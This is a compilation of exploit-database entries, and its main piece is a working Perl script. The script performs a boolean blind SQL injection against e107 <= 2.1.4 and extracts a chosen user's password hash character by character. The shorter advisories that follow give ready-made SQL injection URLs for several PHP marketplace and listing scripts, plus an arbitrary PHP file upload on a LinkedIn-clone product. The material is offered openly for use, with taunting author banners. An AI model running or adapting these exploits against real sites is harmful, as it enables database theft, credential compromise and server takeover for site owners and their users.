# [*] Discovered on 09/03/2017
# [*] Site Vendor: http://www.e107.org
# [*] BUG: Blind SQL Injection
# --------------------------------------------------------------------------
#
#
# Description
# -------------------------------------------------------------------------
# e107 contains one flaw that allows an attacker to carry out an SQL
# injection attack. The issue is due to the "e107_plugins/pm/pm.php" script
# not properly sanitizing user-supplied input to the "keyword" POST variable.
# This may allow an attacker to inject or manipulate SQL queries in
# the backend database regardless of php.ini settings.
# -------------------------------------------------------------------------
# SHORT EXPLANATION
# -----------------------------------
# 
# FILE:  "e107_handlers/core_functions.php"
#
# 76. function vartrue(&$val, $default='')                     
# 77. {
# 78.   if (isset($val) && $val) { return $val; } {1} <--- variable is not sanitized before being sent to the MySQL database
# 79.    return $default;
# 80.}
#
# ----------------------------------
#
# FILE: "e107/e107_plugins/pm/pm.php"
#
# 
# 35. if(vartrue($_POST['keyword']))   {2}<--- if $_POST keyword variable is set, then e107 starts pm_user_lookup() function.
# 36. {
# 37.   pm_user_lookup();
# 38.}
#
#
#
# 615. function pm_user_lookup()
# 616. {
# 617.  $sql = e107::getDb();
# 618.
# 619. $query = "SELECT * FROM #user WHERE user_name REGEXP '^".$_POST['keyword']."' "; {3} <---- variable not sanitized
# 620. if($sql->gen($query))
# 621. {
# 622. echo '[';
# 623  while($row = $sql->fetch())
# 624. {
# 625.   $u[] =  "{\"caption\":\"".$row['user_name']."\",\"value\":".$row['user_id']."}";
# 626. }
# 627.
# 628.  echo implode(",",$u);
# 629.  echo ']';
# -----------------------------------
#
#
# use your brain..
#
# Greetz to: Warwolfz Crew,
# meh, Dante90, SHADES MASTER and nexen
#
# -- 0gay --
#
# -----------------------------------
# YOUR MOM IS NOT SAFE ANYMORE!!
# CALL HER!!
# -----------------------------------



use strict;
use IO::Socket::INET;
use LWP::UserAgent;


        

# Positional arguments: the target host/URL and the numeric e107 user id
# whose password hash is read back.  $uid is a file-scoped lexical that
# sql() reads directly; it is not passed as a parameter.
my ($URL,$uid) = @ARGV;
# Candidate character codes tried at each hash position.
my @chars = (8..122);
my ($i,$ord,$hash) = (1,undef,undef);





if (@ARGV != 2) { usage(); } 


# Make sure the target carries an http:// scheme.
$URL = parse::URL($URL);


syswrite (STDOUT,"[-] Crypted Password: ");


# Boolean-based blind extraction: for $i = 0..60, try every code in @chars
# until e107::Query reports a hit (666), append that character and move on.
for ($i=0;$i<=60;$i++) 
{
   foreach $ord (@chars) 
   { 
      if (e107::Query(sql($i,$ord),$URL) == 666 ) 
	  {  
	      syswrite (STDOUT,chr($ord));
		  $hash .= chr($ord);
		  last;
	  }
	  # Give up if nothing has matched by the time position 2 is reached.
	  # NOTE(review): this is evaluated once per candidate while $i == 2,
	  # not once per position; harmless, since $hash is checked each time.
	  if ($i == 2 and not defined $hash) 
	  {
	     syswrite (STDOUT,"\n[-] Exploit Failed");
		 exit;
	  }	 
   }		   
}



# NOTE(review): both branches end in die(), so the process exits non-zero
# even on success; the success message also lacks the leading "\n" its
# sibling has.
if (length($hash) == 60) {
   die "\[-]Exploit Successfully";
}
else {
   die "\n[-] Exploit Failed";
}   





sub e107::Query 
{
     
      # Send one probe and report whether it matched.
      # 1st parameter, sql query (sent as the `keyword` POST value)
      # 2nd parameter, e107 website base URL	  
      # Returns 666 when the response body contains "caption", i.e.
      # pm_user_lookup() emitted at least one row (see the header comment
      # for the server-side code), otherwise 0.

	  my ($query,$URL) = @_;
      my $response = undef; 
	  
      my $lwp = new LWP::UserAgent;


      $lwp->default_header('User-Agent' => 'Lynx (textmode)');

      # NOTE(review): post() returns a response object even on transport or
      # HTTP errors, so the `or die` branch never fires; any failure is
      # reported as 0 (no match) rather than as an error.
      $response = $lwp->post($URL."/pm/",
                            [ 
			     keyword => $query
			    ]) or die $!;


        if ($response->content =~ /caption/) {
		   return 666;
		} 
        else {
           return 0;
        }		   
		 
}


sub parse::URL
{
        # Normalise the target argument: prepend "http://" unless the string
        # already starts with "http:/" (case-insensitive, second slash
        # optional).  Dies when called with an empty or missing argument.
        my $target = shift @_ || die($!);

        return $target if $target =~ /^http:\/\/?/i;
        return 'http://'.$target;
 }
 


sub sql
{
       
      # Build the boolean-based blind injection payload for one probe.
      # 1st parameter, substring position within the stored password hash
      # 2nd parameter, candidate charcode compared against that position
      # The e107 user id is NOT a parameter: it is read from the file-scoped
      # lexical $uid that the top of the script fills from @ARGV.  (The sub
      # takes two arguments, not three as an earlier comment claimed.)

      my ($i,$j,$sql) = (shift,shift,undef);
       
      $sql = "' AND ASCII(SUBSTRING((SELECT user_password FROM e107_user WHERE user_id=".$uid."),".$i.",1))=".$j."#";
              
      return $sql;        
}        





sub e107::Cookies
{
        # Log in over a hand-built HTTP/1.1 POST and return the first
        # Set-Cookie capture.  Not called anywhere in this script (see the
        # author's note at the end of the sub).
        # 1st parameter, username
        # 2nd parameter, password
        # Dies with "[-] Login Failed.." when no Set-Cookie header is seen.

        my ($username,$password) = @_;
        my ($packet,$content);
        
        my $host = "127.0.0.1";   # Valid Host  (insert it manually)
		my $path = "/e107/";      # Valid e107 path (insert it manually)
		
		
		# NOTE(review): `=` binds tighter than `,`, so $data is assigned only
		# "username=" and the rest of the list is evaluated in void context;
		# the credentials never reach the request body as written.
		my $data = "username=",$username."&userpass=".$password."&userlogin=Sign+In";
		
		
		my $socket  = new IO::Socket::INET(
                                            PeerAddr => $host,
                                            PeerPort => 80,
                                            Proto    => 'tcp',
                                          ) or die $!;
		
		
		 
        # NOTE(review): $path already ends in "/" so the request line carries
        # "/e107//login.php".
        $packet .= "POST ".$path."/login.php HTTP/1.1\r\n";
        $packet .= "Host: ".$host."\r\n";
        $packet .= "User-Agent: Lynx (textmode)\r\n";
        $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $packet .= "Content-Length:".length($data)."\r\n";
        $packet .= "Connection: close\r\n\r\n";
        $packet.= $data;
		
        
		$socket->send($packet);
		
		# Slurp the whole response; "Connection: close" ends the loop.
		while (<$socket>) {
		  $content .= $_;
		}  
		
		
		# NOTE(review): the non-greedy `(.+?)` with nothing after it captures a
		# single character, not the cookie value.
		if ($content =~ /Set-Cookie: (.+?)/) {
		    return $1;
	    }
        else {
            die("[-] Login Failed..\n");
        }			
		
		
	# This function is useful to log-in and retrieves your cookies, but you don't need it for this exploit.
        # it works without log-in, but if you got some trouble, try to use this one.
        # (The sub is named e107::Cookies; no e107::Login is defined in this file.)
        
	# e107::Login('YOUR USERNAME','YOUR PASSWORD');
}		
		
		
sub usage() {
        # Print the banner with argument help to STDOUT and terminate the
        # process.  Never returns.
        print <<'USAGE';
[*---------------------------------------------------------*]
[*  e107 <= 2.1.4 'keyword' Blind SQL Injection Exploit    *]
[*---------------------------------------------------------*]
[* Usage: perl web.pl [host] [uid]                         *]
[*                                                         *]
[* Options:                                                *]
[* [host] insert a valid host                              *]
[* [uid]  insert a userid                                  *]
[*---------------------------------------------------------*]
USAGE
        exit;
}		
		
		
	
		
			
            
# # # # # 
# Exploit Title: Domain Marketplace Script - SQL Injection
# Google Dork: N/A
# Date: 11.03.2017
# Vendor Homepage: http://scripteen.com/
# Software: http://scripteen.com/item/scripts/scripteen-domain-marketplace-script.html
# Demo: http://dwm.domainauctionsscript.com/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail: ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?page=websites_for_sale&cat=[SQL]
# users :userId
# users :data
# users :payment_date
# users :expiration_date
# users :username
# users :password
# users :nume
# users :adresa
# Etc..
# # # # #
            
# # # # # 
# Exploit Title: Global In – A LinkedIn Clone - SQL Injection
# Google Dork: N/A
# Date: 11.03.2017
# Vendor Homepage: https://www.techbizstudio.com/
# Software: https://www.techbizstudio.com/product/linkedin-clone/
# Demo: https://www.techbizstudio.com/demo/globalin/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail: ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/hsearch?accept=true&fnm=[SQL]&lnm=[SQL]
# http://localhost/[PATH]/search?type=company&key=[SQL] [Login as regular user]
# http://localhost/[PATH]/search?type=people&key=[SQL]&fnm=[SQL]&lnm=[SQL]&title=[SQL]&com=[SQL]&sc=[SQL]&co=[SQL]&industry=[SQL] [Login as regular user]
# tb_admin :id
# tb_admin :username
# tb_admin :email
# tb_admin :password
# tb_admin :ip_address
# tb_admin :is_active
# Etc..
# # # # #
            
# # # # # 
# Exploit Title: Global In - Arbitrary File Upload
# Google Dork: N/A
# Date: 11.03.2017
# Vendor Homepage: https://www.techbizstudio.com/
# Software: https://www.techbizstudio.com/product/linkedin-clone/
# Demo: https://www.techbizstudio.com/demo/globalin/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail: ihsan[@]ihsan[.]net
# # # # #
# Exploit :
# Login as regular user
# http://localhost/[PATH]/dashboard
# Upload Photo / File.php
# http://localhost/[PATH]/post-images/1113330455_File.php
# Etc..
# # # # #
            
# # # # # 
# Exploit Title: Vanelo – Wanelo Clone - SQL Injection
# Google Dork: N/A
# Date: 11.03.2017
# Vendor Homepage: https://www.zoplay.com/
# Software: https://www.zoplay.com/web/trending-marketplace-website/
# Demo: http://wanelo.zoplay.com/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail: ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/shopby/IhsanSencan?q=[SQL]
# Duplicate entry 'waneloclone
# Etc..
# # # # #
            
# # # # # 
# Exploit Title: Pet Listing Script v3.0 - SQL Injection
# Google Dork: N/A
# Date: 11.03.2017
# Vendor Homepage: https://www.phpjabbers.com/
# Software: https://www.phpjabbers.com/pet-listing-script/
# Demo: http://demo.phpjabbers.com/index.php?demo=petls&front=1&lid=1
# Version: 3.0
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail: ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/preview.php?controller=pjListings&action=pjActionIndex&listing_search=1&year_from=2017[SQL]&year_to=2017[SQL]
# Etc..
# # # # #
            
# # # # # 
# Exploit Title: Property Listing Script v3.1 - SQL Injection
# Google Dork: N/A
# Date: 11.03.2017
# Vendor Homepage: https://www.phpjabbers.com/
# Software: https://www.phpjabbers.com/property-listing-script/
# Demo: http://demo.phpjabbers.com/index.php?demo=pls&front=1&lid=1
# Version: 3.1
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail: ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1[SQL]&max_bedrooms=1[SQL]&min_bathrooms=1[SQL]&max_bathrooms=2[SQL]
# Etc..
# # # # #